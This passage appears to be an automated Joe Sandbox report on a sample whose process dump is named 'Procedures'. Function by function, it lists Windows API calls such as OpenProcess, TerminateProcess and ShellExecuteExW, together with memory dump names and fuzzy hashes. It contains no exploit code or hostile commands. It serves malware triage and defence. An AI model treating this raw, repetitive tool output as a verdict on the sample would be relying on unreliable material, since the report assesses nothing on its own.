                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Virtual
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 4278518827-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 2567c5d2febf7f996c72d6dde6cc1c6af213e019a8e136e9c1d49b04d6edf922
                                                                                                                                                                                                                                                                                                    • Instruction ID: 24ba6074a2fedb78b684e90061e5b15493a57f8f59769b1a0a1d8217660be5fc
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2567c5d2febf7f996c72d6dde6cc1c6af213e019a8e136e9c1d49b04d6edf922
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 55016CB09017597DE3008F5A8C85B53FFA8FF19354F00411B915C47941C7F5A864CBE5
                                                                                                                                                                                                                                                                                                    Function 00E8F437 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00E8F447
                                                                                                                                                                                                                                                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00E8F45D
                                                                                                                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00E8F46C
                                                                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E8F47B
                                                                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E8F485
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E8F48C
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 839392675-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: a69a7e2e67f6d7fd283096ae2d955df04d29013d32ce2ee7824a8b3499ccede0
                                                                                                                                                                                                                                                                                                    • Instruction ID: 960a547f400009a7fe638b859f5d0b8b011bc73de1e6da31d953981c59660251
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a69a7e2e67f6d7fd283096ae2d955df04d29013d32ce2ee7824a8b3499ccede0
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D9F06D32205158BFE72057939C0EEEB3B7CEBC6B11F000159F605E1090A6A01A05C6B5
                                                                                                                                                                                                                                                                                                    Function 00E634D6 Relevance: 9.0, APIs: 6, Instructions: 39windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?), ref: 00E634EF
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 00E63506
                                                                                                                                                                                                                                                                                                    • GetWindowDC.USER32(?), ref: 00E63512
                                                                                                                                                                                                                                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 00E63521
                                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00E63533
                                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(00000005), ref: 00E6354D
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 272304278-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 72291cf04bfbc79c58245d59050d3c55fdfb3e80e57bc68da6e820dbcf40802e
                                                                                                                                                                                                                                                                                                    • Instruction ID: 40414e81b78af4edbbb3b674c5234ff9b6ea50dc8e702b55d288031c464cae52
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 72291cf04bfbc79c58245d59050d3c55fdfb3e80e57bc68da6e820dbcf40802e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE012431505215EFDB615BA6EC08BEA7BB6FB48321F500264FA1AB21A1EB311E55AF10
                                                                                                                                                                                                                                                                                                    Function 00E821C1 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E821CC
                                                                                                                                                                                                                                                                                                    • UnloadUserProfile.USERENV(?,?), ref: 00E821D8
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00E821E1
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00E821E9
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00E821F2
                                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00E821F9
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 146765662-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 01ebc5e3e0f7fb31979f387e996800f7541dd47f0b29dd79207dd6da6759efee
                                                                                                                                                                                                                                                                                                    • Instruction ID: 6bcf02c9b26f08890f54036bd90d8fc52b492cfc1b77c6d41ed052b98b6d6fa7
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 01ebc5e3e0f7fb31979f387e996800f7541dd47f0b29dd79207dd6da6759efee
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02E0C2B600C105BFDB011BE6EC0C94ABF69FB49322B104321F225E2070EB329424DB50
                                                                                                                                                                                                                                                                                                    Function 00EAB7C4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 00EAB903
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E241EA: _wcslen.LIBCMT ref: 00E241EF
                                                                                                                                                                                                                                                                                                    • GetProcessId.KERNEL32(00000000), ref: 00EAB998
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00EAB9C7
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: <$@
                                                                                                                                                                                                                                                                                                    • API String ID: 146682121-1426351568
                                                                                                                                                                                                                                                                                                    • Opcode ID: 836f4dea72695c86a0c5dfb2363c335677559366089e44e4b093abe32a3ebac4
                                                                                                                                                                                                                                                                                                    • Instruction ID: 9c42f0c7ba23353cfd4921f549d6ed8c0bd3a37816fff420fd195fa8e85ddfb1
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 836f4dea72695c86a0c5dfb2363c335677559366089e44e4b093abe32a3ebac4
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E715575A00229DFCB14EF64D894A9EBBF4FF09304F049499E856BB392CB34AD45CB90
                                                                                                                                                                                                                                                                                                    Function 00EB4818 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EB48D1
                                                                                                                                                                                                                                                                                                    • IsMenu.USER32(?), ref: 00EB48E6
                                                                                                                                                                                                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00EB492E
                                                                                                                                                                                                                                                                                                    • DrawMenuBar.USER32 ref: 00EB4941
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                                                                    • API String ID: 3076010158-4108050209
                                                                                                                                                                                                                                                                                                    • Opcode ID: 7d0828ed071785eb8f4c4eb78c44432eab3995cf781cf1cd77ba3767f4910042
                                                                                                                                                                                                                                                                                                    • Instruction ID: 8f937a8e17f456ff0365b99e22fa4e17b139c155e8bf6635ae92ab4fffb05f1f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d0828ed071785eb8f4c4eb78c44432eab3995cf781cf1cd77ba3767f4910042
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 77414BB5A0124AEFDB20CF51D884AEBBBB5FF45328F045129F945A72A1D730AD54CB60
                                                                                                                                                                                                                                                                                                    Function 00E8272F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2B329: _wcslen.LIBCMT ref: 00E2B333
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E84620
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00E827B3
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00E827C6
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00E827F6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E28577: _wcslen.LIBCMT ref: 00E2858A
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$_wcslen$ClassName
                                                                                                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                    • API String ID: 2081771294-1403004172
                                                                                                                                                                                                                                                                                                    • Opcode ID: 5ee67302bf130298b49a708359daeaf7cc4d2f02a83989a17e245f58a7023099
                                                                                                                                                                                                                                                                                                    • Instruction ID: 7534d8c00076d6f2f0a4d6e28e679e9db5043177583b176e4674a9f65913a00f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ee67302bf130298b49a708359daeaf7cc4d2f02a83989a17e245f58a7023099
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C21F671940104BFDB09AB60DC45CFF77B8DF45364F10612AF519B71E1DB3549099B50
                                                                                                                                                                                                                                                                                                    Function 00EB39B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00EB3A29
                                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 00EB3A30
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00EB3A45
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00EB3A4D
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                                                                                                                                                    • String ID: SysAnimate32
                                                                                                                                                                                                                                                                                                    • API String ID: 3529120543-1011021900
                                                                                                                                                                                                                                                                                                    • Opcode ID: 04a75f6f9480c62c3b74f561ea8c421b3c6c315d8f9964220cfcdc65888848c3
                                                                                                                                                                                                                                                                                                    • Instruction ID: e1b1b7aea4321d4c0c0b0fd0ed48d2a8f35b5464ea4d14603dd7abea66ebdbb2
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 04a75f6f9480c62c3b74f561ea8c421b3c6c315d8f9964220cfcdc65888848c3
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C021AE71600209AFEB109F75DC82FFB77E9EB84368F216218FA91B21A4D771CD409760
                                                                                                                                                                                                                                                                                                    Function 00EB9A25 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00E224B0
                                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00EB9A5D
                                                                                                                                                                                                                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00EB9A72
                                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00EB9ABA
                                                                                                                                                                                                                                                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00EB9AF0
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                                                                                                                                    • API String ID: 2864067406-2063206799
                                                                                                                                                                                                                                                                                                    • Opcode ID: ea839efc5fccbc9db13d9deb0ca8b03d8f5584444b200ad7ed30bf4b77e9b463
                                                                                                                                                                                                                                                                                                    • Instruction ID: dc4c6eca2d6be5eff640a0ac0619819689ab1019a2dbdd2cf440f32b3784aa98
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ea839efc5fccbc9db13d9deb0ca8b03d8f5584444b200ad7ed30bf4b77e9b463
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8221CA34600018EFCB258F95C848EFB7BB9EF49310F404169FA05BB1A2E3309950DB60
                                                                                                                                                                                                                                                                                                    Function 00E21AAC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00E224B0
                                                                                                                                                                                                                                                                                                    • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00E21AF4
                                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00E631F9
                                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00E63203
                                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00E6320E
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                                                                                                                                    • API String ID: 4127811313-2063206799
                                                                                                                                                                                                                                                                                                    • Opcode ID: 3f6d8e15d4dd30a4e7f044329e41153d4404248a877fe375a329847bf1da126e
                                                                                                                                                                                                                                                                                                    • Instruction ID: 36c929b2a15690a252d2b6b069699aaaaf709800f397425c90deeffbee38f6f8
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f6d8e15d4dd30a4e7f044329e41153d4404248a877fe375a329847bf1da126e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA115871A01029AFCB109FA8E9468EE77B8EB45394F001596EA12B2140D730AB81CBA1
                                                                                                                                                                                                                                                                                                    Function 00E450DD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00E4508E,?,?,00E4502E,?,00EE98D8,0000000C,00E45185,?,00000002), ref: 00E450FD
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00E45110
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00E4508E,?,?,00E4502E,?,00EE98D8,0000000C,00E45185,?,00000002,00000000), ref: 00E45133
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                                    • Opcode ID: f0ce37b9800839750dd4e54ab982e1a5a01486fbfd5125d242b63bee98cacb0a
                                                                                                                                                                                                                                                                                                    • Instruction ID: da4a3c108cb241baf5ee1be17b2e48d33d0cd4a69f5e11d58eca0232993ca532
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f0ce37b9800839750dd4e54ab982e1a5a01486fbfd5125d242b63bee98cacb0a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0F0C231A05608BFDB149F95EC49BAEBFF8EF04716F0011A9F809B2261DB359E55CA90
                                                                                                                                                                                                                                                                                                    Function 00E7E778 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32 ref: 00E7E785
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00E7E797
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00E7E7BD
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
